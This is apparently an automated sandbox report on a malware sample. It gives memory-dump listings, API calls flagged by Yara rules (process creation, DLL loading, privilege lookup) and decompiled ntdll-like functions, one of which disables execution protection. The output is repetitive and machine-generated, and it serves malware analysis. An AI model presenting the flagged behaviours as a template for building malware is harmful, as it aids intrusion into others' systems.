                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2378259143.00000000022A0000.00000040.00000001.sdmp, Offset: 02290000, based on PE: true
                                    • Associated: 00000007.00000002.2378253920.0000000002290000.00000040.00000001.sdmp
                                    • Associated: 00000007.00000002.2378345340.0000000002380000.00000040.00000001.sdmp
                                    • Associated: 00000007.00000002.2378351184.0000000002390000.00000040.00000001.sdmp
                                    • Associated: 00000007.00000002.2378357251.0000000002394000.00000040.00000001.sdmp
                                    • Associated: 00000007.00000002.2378363645.0000000002397000.00000040.00000001.sdmp
                                    • Associated: 00000007.00000002.2378369400.00000000023A0000.00000040.00000001.sdmp
                                    • Associated: 00000007.00000002.2378402410.0000000002400000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2378259143.00000000022A0000.00000040.00000001.sdmp, Offset: 02290000, based on PE: true
                                    • Associated: 00000007.00000002.2378253920.0000000002290000.00000040.00000001.sdmp
                                    • Associated: 00000007.00000002.2378345340.0000000002380000.00000040.00000001.sdmp
                                    • Associated: 00000007.00000002.2378351184.0000000002390000.00000040.00000001.sdmp
                                    • Associated: 00000007.00000002.2378357251.0000000002394000.00000040.00000001.sdmp
                                    • Associated: 00000007.00000002.2378363645.0000000002397000.00000040.00000001.sdmp
                                    • Associated: 00000007.00000002.2378369400.00000000023A0000.00000040.00000001.sdmp
                                    • Associated: 00000007.00000002.2378402410.0000000002400000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2378259143.00000000022A0000.00000040.00000001.sdmp, Offset: 02290000, based on PE: true
                                    • Associated: 00000007.00000002.2378253920.0000000002290000.00000040.00000001.sdmp
                                    • Associated: 00000007.00000002.2378345340.0000000002380000.00000040.00000001.sdmp
                                    • Associated: 00000007.00000002.2378351184.0000000002390000.00000040.00000001.sdmp
                                    • Associated: 00000007.00000002.2378357251.0000000002394000.00000040.00000001.sdmp
                                    • Associated: 00000007.00000002.2378363645.0000000002397000.00000040.00000001.sdmp
                                    • Associated: 00000007.00000002.2378369400.00000000023A0000.00000040.00000001.sdmp
                                    • Associated: 00000007.00000002.2378402410.0000000002400000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2378259143.00000000022A0000.00000040.00000001.sdmp, Offset: 02290000, based on PE: true
                                    • Associated: 00000007.00000002.2378253920.0000000002290000.00000040.00000001.sdmp
                                    • Associated: 00000007.00000002.2378345340.0000000002380000.00000040.00000001.sdmp
                                    • Associated: 00000007.00000002.2378351184.0000000002390000.00000040.00000001.sdmp
                                    • Associated: 00000007.00000002.2378357251.0000000002394000.00000040.00000001.sdmp
                                    • Associated: 00000007.00000002.2378363645.0000000002397000.00000040.00000001.sdmp
                                    • Associated: 00000007.00000002.2378369400.00000000023A0000.00000040.00000001.sdmp
                                    • Associated: 00000007.00000002.2378402410.0000000002400000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • Sleep.KERNELBASE(000007D0), ref: 00096F78
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2377810691.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                    Yara matches
                                    Similarity
                                    • API ID: Sleep
                                    • String ID: net.dll$wininet.dll
                                    • API String ID: 3472027048-1269752229
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • Sleep.KERNELBASE(000007D0), ref: 00096F78
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2377810691.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                    Yara matches
                                    Similarity
                                    • API ID: Sleep
                                    • String ID: net.dll$wininet.dll
                                    • API String ID: 3472027048-1269752229
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00083B93), ref: 000984ED
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2377810691.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                    Yara matches
                                    Similarity
                                    • API ID: FreeHeap
                                    • String ID: .z`
                                    • API String ID: 3298025750-1441809116
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00083B93), ref: 000984ED
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2377810691.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                    Yara matches
                                    Similarity
                                    • API ID: FreeHeap
                                    • String ID: .z`
                                    • API String ID: 3298025750-1441809116
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 000872BA
                                    • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 000872DB
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2377810691.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                    Yara matches
                                    Similarity
                                    • API ID: MessagePostThread
                                    • String ID:
                                    • API String ID: 1836367815-0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00098584
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2377810691.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                    Yara matches
                                    Similarity
                                    • API ID: CreateInternalProcess
                                    • String ID:
                                    • API String ID: 2186235152-0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00089B82
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2377810691.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                    Yara matches
                                    Similarity
                                    • API ID: Load
                                    • String ID:
                                    • API String ID: 2234796835-0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00098584
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2377810691.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                    Yara matches
                                    Similarity
                                    • API ID: CreateInternalProcess
                                    • String ID:
                                    • API String ID: 2186235152-0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0008CCC0,?,?), ref: 0009703C
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2377810691.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                    Yara matches
                                    Similarity
                                    • API ID: CreateThread
                                    • String ID:
                                    • API String ID: 2422867632-0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0008CCC0,?,?), ref: 0009703C
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2377810691.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                    Yara matches
                                    Similarity
                                    • API ID: CreateThread
                                    • String ID:
                                    • API String ID: 2422867632-0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,0008CF92,0008CF92,?,00000000,?,?), ref: 00098650
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2377810691.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                    Yara matches
                                    Similarity
                                    • API ID: LookupPrivilegeValue
                                    • String ID:
                                    • API String ID: 3899507212-0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • SetErrorMode.KERNELBASE(00008003,?,?,00087C63,?), ref: 0008D42B
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2377810691.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorMode
                                    • String ID:
                                    • API String ID: 2340568224-0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Non-executed Functions

                                    C-Code - Quality: 94%
                                    			E022D8788(signed int __ecx, void* __edx, signed int _a4) {
                                    				signed int _v8;
                                    				short* _v12;
                                    				void* _v16;
                                    				signed int _v20;
                                    				char _v24;
                                    				signed int _v28;
                                    				signed int _v32;
                                    				char _v36;
                                    				signed int _v40;
                                    				char _v44;
                                    				signed int _v48;
                                    				signed int _v52;
                                    				signed int _v56;
                                    				signed int _v60;
                                    				char _v68;
                                    				void* _t216;
                                    				intOrPtr _t231;
                                    				short* _t235;
                                    				intOrPtr _t257;
                                    				short* _t261;
                                    				intOrPtr _t284;
                                    				intOrPtr _t288;
                                    				void* _t314;
                                    				signed int _t318;
                                    				short* _t319;
                                    				intOrPtr _t321;
                                    				void* _t328;
                                    				void* _t329;
                                    				char* _t332;
                                    				signed int _t333;
                                    				signed int* _t334;
                                    				void* _t335;
                                    				void* _t338;
                                    				void* _t339;
                                    
                                    				_t328 = __edx;
                                    				_t322 = __ecx;
                                    				_t318 = 0;
                                    				_t334 = _a4;
                                    				_v8 = 0;
                                    				_v28 = 0;
                                    				_v48 = 0;
                                    				_v20 = 0;
                                    				_v40 = 0;
                                    				_v32 = 0;
                                    				_v52 = 0;
                                    				if(_t334 == 0) {
                                    					_t329 = 0xc000000d;
                                    					L49:
                                    					_t334[0x11] = _v56;
                                    					 *_t334 =  *_t334 | 0x00000800;
                                    					_t334[0x12] = _v60;
                                    					_t334[0x13] = _v28;
                                    					_t334[0x17] = _v20;
                                    					_t334[0x16] = _v48;
                                    					_t334[0x18] = _v40;
                                    					_t334[0x14] = _v32;
                                    					_t334[0x15] = _v52;
                                    					return _t329;
                                    				}
                                    				_v56 = 0;
                                    				if(E022D8460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
                                    					_v56 = 1;
                                    					if(_v8 != 0) {
                                    						_t207 = E022BE025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
                                    					}
                                    					_push(1);
                                    					_v8 = _t318;
                                    					E022D718A(_t207);
                                    					_t335 = _t335 + 4;
                                    				}
                                    				_v60 = _v60 | 0xffffffff;
                                    				if(E022D8460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
                                    					_t333 =  *_v8;
                                    					_v60 = _t333;
                                    					_t314 = E022BE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                    					_push(_t333);
                                    					_v8 = _t318;
                                    					E022D718A(_t314);
                                    					_t335 = _t335 + 4;
                                    				}
                                    				_t216 = E022D8460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
                                    				_t332 = ";";
                                    				if(_t216 < 0) {
                                    					L17:
                                    					if(E022D8460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
                                    						L30:
                                    						if(E022D8460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
                                    							L46:
                                    							_t329 = 0;
                                    							L47:
                                    							if(_v8 != _t318) {
                                    								E022BE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                    							}
                                    							if(_v28 != _t318) {
                                    								if(_v20 != _t318) {
                                    									E022BE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
                                    									_v20 = _t318;
                                    									_v40 = _t318;
                                    								}
                                    							}
                                    							goto L49;
                                    						}
                                    						_t231 = _v24;
                                    						_t322 = _t231 + 4;
                                    						_push(_t231);
                                    						_v52 = _t322;
                                    						E022D718A(_t231);
                                    						if(_t322 == _t318) {
                                    							_v32 = _t318;
                                    						} else {
                                    							_v32 = E022BE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                    						}
                                    						if(_v32 == _t318) {
                                    							_v52 = _t318;
                                    							L58:
                                    							_t329 = 0xc0000017;
                                    							goto L47;
                                    						} else {
                                    							E022B2340(_v32, _v8, _v24);
                                    							_v16 = _v32;
                                    							_a4 = _t318;
                                    							_t235 = E022CE679(_v32, _t332);
                                    							while(1) {
                                    								_t319 = _t235;
                                    								if(_t319 == 0) {
                                    									break;
                                    								}
                                    								 *_t319 = 0;
                                    								_t321 = _t319 + 2;
                                    								E022BE2A8(_t322,  &_v68, _v16);
                                    								if(E022D5553(_t328,  &_v68,  &_v36) != 0) {
                                    									_a4 = _a4 + 1;
                                    								}
                                    								_v16 = _t321;
                                    								_t235 = E022CE679(_t321, _t332);
                                    								_pop(_t322);
                                    							}
                                    							_t236 = _v16;
                                    							if( *_v16 != _t319) {
                                    								E022BE2A8(_t322,  &_v68, _t236);
                                    								if(E022D5553(_t328,  &_v68,  &_v36) != 0) {
                                    									_a4 = _a4 + 1;
                                    								}
                                    							}
                                    							if(_a4 == 0) {
                                    								E022BE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
                                    								_v52 = _v52 & 0x00000000;
                                    								_v32 = _v32 & 0x00000000;
                                    							}
                                    							if(_v8 != 0) {
                                    								E022BE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
                                    							}
                                    							_v8 = _v8 & 0x00000000;
                                    							_t318 = 0;
                                    							goto L46;
                                    						}
                                    					}
                                    					_t257 = _v24;
                                    					_t322 = _t257 + 4;
                                    					_push(_t257);
                                    					_v40 = _t322;
                                    					E022D718A(_t257);
                                    					_t338 = _t335 + 4;
                                    					if(_t322 == _t318) {
                                    						_v20 = _t318;
                                    					} else {
                                    						_v20 = E022BE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                    					}
                                    					if(_v20 == _t318) {
                                    						_v40 = _t318;
                                    						goto L58;
                                    					} else {
                                    						E022B2340(_v20, _v8, _v24);
                                    						_v16 = _v20;
                                    						_a4 = _t318;
                                    						_t261 = E022CE679(_v20, _t332);
                                    						_t335 = _t338 + 0x14;
                                    						while(1) {
                                    							_v12 = _t261;
                                    							if(_t261 == _t318) {
                                    								break;
                                    							}
                                    							_v12 = _v12 + 2;
                                    							 *_v12 = 0;
                                    							E022BE2A8(_v12,  &_v68, _v16);
                                    							if(E022D5553(_t328,  &_v68,  &_v36) != 0) {
                                    								_a4 = _a4 + 1;
                                    							}
                                    							_v16 = _v12;
                                    							_t261 = E022CE679(_v12, _t332);
                                    							_pop(_t322);
                                    						}
                                    						_t269 = _v16;
                                    						if( *_v16 != _t318) {
                                    							E022BE2A8(_t322,  &_v68, _t269);
                                    							if(E022D5553(_t328,  &_v68,  &_v36) != 0) {
                                    								_a4 = _a4 + 1;
                                    							}
                                    						}
                                    						if(_a4 == _t318) {
                                    							E022BE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
                                    							_v40 = _t318;
                                    							_v20 = _t318;
                                    						}
                                    						if(_v8 != _t318) {
                                    							E022BE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                    						}
                                    						_v8 = _t318;
                                    						goto L30;
                                    					}
                                    				}
                                    				_t284 = _v24;
                                    				_t322 = _t284 + 4;
                                    				_push(_t284);
                                    				_v48 = _t322;
                                    				E022D718A(_t284);
                                    				_t339 = _t335 + 4;
                                    				if(_t322 == _t318) {
                                    					_v28 = _t318;
                                    				} else {
                                    					_v28 = E022BE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                    				}
                                    				if(_v28 == _t318) {
                                    					_v48 = _t318;
                                    					goto L58;
                                    				} else {
                                    					E022B2340(_v28, _v8, _v24);
                                    					_v16 = _v28;
                                    					_a4 = _t318;
                                    					_t288 = E022CE679(_v28, _t332);
                                    					_t335 = _t339 + 0x14;
                                    					while(1) {
                                    						_v12 = _t288;
                                    						if(_t288 == _t318) {
                                    							break;
                                    						}
                                    						_v12 = _v12 + 2;
                                    						 *_v12 = 0;
                                    						E022BE2A8(_v12,  &_v68, _v16);
                                    						if(E022D5553(_t328,  &_v68,  &_v36) != 0) {
                                    							_a4 = _a4 + 1;
                                    						}
                                    						_v16 = _v12;
                                    						_t288 = E022CE679(_v12, _t332);
                                    						_pop(_t322);
                                    					}
                                    					_t296 = _v16;
                                    					if( *_v16 != _t318) {
                                    						E022BE2A8(_t322,  &_v68, _t296);
                                    						if(E022D5553(_t328,  &_v68,  &_v36) != 0) {
                                    							_a4 = _a4 + 1;
                                    						}
                                    					}
                                    					if(_a4 == _t318) {
                                    						E022BE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
                                    						_v48 = _t318;
                                    						_v28 = _t318;
                                    					}
                                    					if(_v8 != _t318) {
                                    						E022BE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                    					}
                                    					_v8 = _t318;
                                    					goto L17;
                                    				}
                                    			}






































                                    APIs
                                    Strings
                                    • Kernel-MUI-Language-SKU, xrefs: 022D89FC
                                    • Kernel-MUI-Language-Allowed, xrefs: 022D8827
                                    • WindowsExcludedProcs, xrefs: 022D87C1
                                    • Kernel-MUI-Number-Allowed, xrefs: 022D87E6
                                    • Kernel-MUI-Language-Disallowed, xrefs: 022D8914
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2378259143.00000000022A0000.00000040.00000001.sdmp, Offset: 02290000, based on PE: true
                                    • Associated: 00000007.00000002.2378253920.0000000002290000.00000040.00000001.sdmp
                                    • Associated: 00000007.00000002.2378345340.0000000002380000.00000040.00000001.sdmp
                                    • Associated: 00000007.00000002.2378351184.0000000002390000.00000040.00000001.sdmp
                                    • Associated: 00000007.00000002.2378357251.0000000002394000.00000040.00000001.sdmp
                                    • Associated: 00000007.00000002.2378363645.0000000002397000.00000040.00000001.sdmp
                                    • Associated: 00000007.00000002.2378369400.00000000023A0000.00000040.00000001.sdmp
                                    • Associated: 00000007.00000002.2378402410.0000000002400000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: _wcspbrk
                                    • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                    • API String ID: 402402107-258546922
                                    • Opcode ID: 4369711adfa5c1dc455a2e3fffed765c3586279856a9dcd67fe747b6ba59e384
                                    • Instruction ID: e3517270dad52de74dbe7303274d5b02bd51e708b5607ac5eaf8aacef429fa02
                                    • Opcode Fuzzy Hash: 4369711adfa5c1dc455a2e3fffed765c3586279856a9dcd67fe747b6ba59e384
                                    • Instruction Fuzzy Hash: 4FF1E3B2D20209EFDF11EFD8C9809EEBBB9BF08304F15446AE505A7215E734AA45DF61
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 38%
                                    			E022F13CB(intOrPtr* _a4, intOrPtr _a8) {
                                    				char _v8;
                                    				intOrPtr _v12;
                                    				intOrPtr* _v16;
                                    				intOrPtr _v20;
                                    				char _v24;
                                    				intOrPtr _t71;
                                    				signed int _t78;
                                    				signed int _t86;
                                    				char _t90;
                                    				signed int _t91;
                                    				signed int _t96;
                                    				intOrPtr _t108;
                                    				signed int _t114;
                                    				void* _t115;
                                    				intOrPtr _t128;
                                    				intOrPtr* _t129;
                                    				void* _t130;
                                    
                                    				_t129 = _a4;
                                    				_t128 = _a8;
                                    				_t116 = 0;
                                    				_t71 = _t128 + 0x5c;
                                    				_v8 = 8;
                                    				_v20 = _t71;
                                    				if( *_t129 == 0) {
                                    					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
                                    						goto L5;
                                    					} else {
                                    						_t96 =  *(_t129 + 8) & 0x0000ffff;
                                    						if(_t96 != 0) {
                                    							L38:
                                    							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
                                    								goto L5;
                                    							} else {
                                    								_push( *(_t129 + 0xf) & 0x000000ff);
                                    								_push( *(_t129 + 0xe) & 0x000000ff);
                                    								_push( *(_t129 + 0xd) & 0x000000ff);
                                    								_t86 = E022E7707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
                                    								L36:
                                    								return _t128 + _t86 * 2;
                                    							}
                                    						}
                                    						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
                                    						if(_t114 == 0) {
                                    							L33:
                                    							_t115 = 0x22b2926;
                                    							L35:
                                    							_push( *(_t129 + 0xf) & 0x000000ff);
                                    							_push( *(_t129 + 0xe) & 0x000000ff);
                                    							_push( *(_t129 + 0xd) & 0x000000ff);
                                    							_push( *(_t129 + 0xc) & 0x000000ff);
                                    							_t86 = E022E7707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
                                    							goto L36;
                                    						}
                                    						if(_t114 != 0xffff) {
                                    							_t116 = 0;
                                    							goto L38;
                                    						}
                                    						if(_t114 != 0) {
                                    							_t115 = 0x22b9cac;
                                    							goto L35;
                                    						}
                                    						goto L33;
                                    					}
                                    				} else {
                                    					L5:
                                    					_a8 = _t116;
                                    					_a4 = _t116;
                                    					_v12 = _t116;
                                    					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
                                    						if( *(_t129 + 0xa) == 0xfe5e) {
                                    							_v8 = 6;
                                    						}
                                    					}
                                    					_t90 = _v8;
                                    					if(_t90 <= _t116) {
                                    						L11:
                                    						if(_a8 - _a4 <= 1) {
                                    							_a8 = _t116;
                                    							_a4 = _t116;
                                    						}
                                    						_t91 = 0;
                                    						if(_v8 <= _t116) {
                                    							L22:
                                    							if(_v8 < 8) {
                                    								_push( *(_t129 + 0xf) & 0x000000ff);
                                    								_push( *(_t129 + 0xe) & 0x000000ff);
                                    								_push( *(_t129 + 0xd) & 0x000000ff);
                                    								_t128 = _t128 + E022E7707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
                                    							}
                                    							return _t128;
                                    						} else {
                                    							L14:
                                    							L14:
                                    							if(_a4 > _t91 || _t91 >= _a8) {
                                    								if(_t91 != _t116 && _t91 != _a8) {
                                    									_push(":");
                                    									_push(_t71 - _t128 >> 1);
                                    									_push(_t128);
                                    									_t128 = _t128 + E022E7707() * 2;
                                    									_t71 = _v20;
                                    									_t130 = _t130 + 0xc;
                                    								}
                                    								_t78 = E022E7707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
                                    								_t130 = _t130 + 0x10;
                                    							} else {
                                    								_push(L"::");
                                    								_push(_t71 - _t128 >> 1);
                                    								_push(_t128);
                                    								_t78 = E022E7707();
                                    								_t130 = _t130 + 0xc;
                                    								_t91 = _a8 - 1;
                                    							}
                                    							_t91 = _t91 + 1;
                                    							_t128 = _t128 + _t78 * 2;
                                    							_t71 = _v20;
                                    							if(_t91 >= _v8) {
                                    								goto L22;
                                    							}
                                    							_t116 = 0;
                                    							goto L14;
                                    						}
                                    					} else {
                                    						_t108 = 1;
                                    						_v16 = _t129;
                                    						_v24 = _t90;
                                    						do {
                                    							if( *_v16 == _t116) {
                                    								if(_t108 - _v12 > _a8 - _a4) {
                                    									_a4 = _v12;
                                    									_a8 = _t108;
                                    								}
                                    								_t116 = 0;
                                    							} else {
                                    								_v12 = _t108;
                                    							}
                                    							_v16 = _v16 + 2;
                                    							_t108 = _t108 + 1;
                                    							_t26 =  &_v24;
                                    							 *_t26 = _v24 - 1;
                                    						} while ( *_t26 != 0);
                                    						goto L11;
                                    					}
                                    				}
                                    			}

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2378259143.00000000022A0000.00000040.00000001.sdmp, Offset: 02290000, based on PE: true
                                    Similarity
                                    • API ID: ___swprintf_l
                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                    • API String ID: 48624451-2108815105
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 64%
                                    			E022E7EFD(void* __ecx, intOrPtr _a4) {
                                    				signed int _v8;
                                    				char _v540;
                                    				unsigned int _v544;
                                    				signed int _v548;
                                    				intOrPtr _v552;
                                    				char _v556;
                                    				void* __ebx;
                                    				void* __edi;
                                    				void* __esi;
                                    				signed int _t33;
                                    				void* _t38;
                                    				unsigned int _t46;
                                    				unsigned int _t47;
                                    				unsigned int _t52;
                                    				intOrPtr _t56;
                                    				unsigned int _t62;
                                    				void* _t69;
                                    				void* _t70;
                                    				intOrPtr _t72;
                                    				signed int _t73;
                                    				void* _t74;
                                    				void* _t75;
                                    				void* _t76;
                                    				void* _t77;
                                    
                                    				_t33 =  *0x2392088; // 0x777da72f
                                    				_v8 = _t33 ^ _t73;
                                    				_v548 = _v548 & 0x00000000;
                                    				_t72 = _a4;
                                    				if(E022E7F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
                                    					__eflags = _v548;
                                    					if(_v548 == 0) {
                                    						goto L1;
                                    					}
                                    					_t62 = _t72 + 0x24;
                                    					E02303F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
                                    					_t71 = 0x214;
                                    					_v544 = 0x214;
                                    					E022BDFC0( &_v540, 0, 0x214);
                                    					_t75 = _t74 + 0x20;
                                    					_t46 =  *0x2394218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
                                    					__eflags = _t46;
                                    					if(_t46 == 0) {
                                    						goto L1;
                                    					}
                                    					_t47 = _v544;
                                    					__eflags = _t47;
                                    					if(_t47 == 0) {
                                    						goto L1;
                                    					}
                                    					__eflags = _t47 - 0x214;
                                    					if(_t47 >= 0x214) {
                                    						goto L1;
                                    					}
                                    					_push(_t62);
                                    					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
                                    					E02303F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
                                    					_t52 = E022C0D27( &_v540, L"Execute=1");
                                    					_t76 = _t75 + 0x1c;
                                    					_push(_t62);
                                    					__eflags = _t52;
                                    					if(_t52 == 0) {
                                    						E02303F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
                                    						_t71 =  &_v540;
                                    						_t56 = _t73 + _v544 - 0x218;
                                    						_t77 = _t76 + 0x14;
                                    						_v552 = _t56;
                                    						__eflags = _t71 - _t56;
                                    						if(_t71 >= _t56) {
                                    							goto L1;
                                    						} else {
                                    							goto L10;
                                    						}
                                    						while(1) {
                                    							L10:
                                    							_t62 = E022C8375(_t71, 0x20);
                                    							_pop(_t69);
                                    							__eflags = _t62;
                                    							if(__eflags != 0) {
                                    								__eflags = 0;
                                    								 *_t62 = 0;
                                    							}
                                    							E02303F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
                                    							_t77 = _t77 + 0x10;
                                    							E0232E8DB(_t69, _t70, __eflags, _t72, _t71);
                                    							__eflags = _t62;
                                    							if(_t62 == 0) {
                                    								goto L1;
                                    							}
                                    							_t31 = _t62 + 2; // 0x2
                                    							_t71 = _t31;
                                    							__eflags = _t71 - _v552;
                                    							if(_t71 >= _v552) {
                                    								goto L1;
                                    							}
                                    						}
                                    					}
                                    					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
                                    					_push(3);
                                    					_push(0x55);
                                    					E02303F92();
                                    					_t38 = 1;
                                    					L2:
                                    					return E022BE1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
                                    				}
                                    				L1:
                                    				_t38 = 0;
                                    				goto L2;
                                    			}

                                    APIs
                                    • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 02303F12
                                    Strings
                                    • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 02303F75
